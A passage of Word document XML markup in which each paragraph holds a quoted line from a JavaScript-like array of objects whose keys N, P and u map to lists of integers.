    <w:p w14:paraId="2A4785A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3, 5, 7, 9, 13, 14, 15, 23, 40, 200, 219, 249, 277, 282, 283, 330, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DF80B6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D597133" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B589C60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2173E977" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 15, 16, 19, 21, 31, 33, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D044DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEE8277" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0FE148" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4236A9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A37D160" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6843F1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0335E3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 6, 7, 9, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F372E49" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5, 8, 196, 208, 290, 309, 349]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F7AB39" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72705131" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E7BA70" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E8525A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABFD3E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711F165A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A96AF0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7856ED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [324]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AB7E7E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03206AB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA99D49" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F03A79A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A41A4A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13555443" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E426A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B96BF91" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [13]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513FD619" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19054E4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B99DC46" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A476BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 26, 66, 160]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C470B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEE39AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A278308" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA93EF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A2359" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DAD9E9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E68B8C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8453C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8EAB92" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6258D561" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FEE62C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D0EA18" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B178D5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61753C3F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699537EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8F15F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849F47A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0834C710" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC56303" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E745EC2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2163E4E9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 14, 23, 40, 219, 249, 277, 282, 283, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10518D79" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD11BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E044E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00480838" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667004B0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7270C48E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B316409" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D78F33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [59, 112, 127, 249, 279, 282, 283, 327, 344, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489D80F4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68D9EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7CFEF0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D0C9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 19, 159, 186, 317, 338]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE9AB31" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75594D91" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E019A8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E92FC33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E1F670" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B7EC3A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE0FC3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDF8981" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AAE64A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C518936" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F09BEC6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E889D1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [150, 254]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC199A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746EFA64" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6088B92D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7834CE15" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 5, 8, 19, 51, 92, 100, 111, 148, 163, 169, 196, 208, 290, 309, 328, 349]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD2FA8F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E30E66" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC3FB6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C150F18" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [261]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF0EDCC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDFA278" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D68BD12" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462A2F89" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3, 4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6E65FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354BCF90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38669EAE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E24B1B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B68391B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586382AB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C98CD5C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0B2A33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [17, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005EB009" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B940403" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086AD085" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE2FA0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [27, 28, 106, 140, 267]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505AE2A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F7856E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C6B6B0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695B3CCD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5, 7, 9, 14, 23, 219, 303]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C386D85" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCE7A7B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3DA191" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166C0C33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1CAFCF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49916347" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A74C8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657EFC43" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A08DD9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516EB32B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDC63B2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E96CCC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [229]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF8C61" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B9168C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A299E8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F710BA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2649994C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708AB766" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AAA624" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B45DB6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 4, 5, 6, 7, 8, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7BF685" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AD1945" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
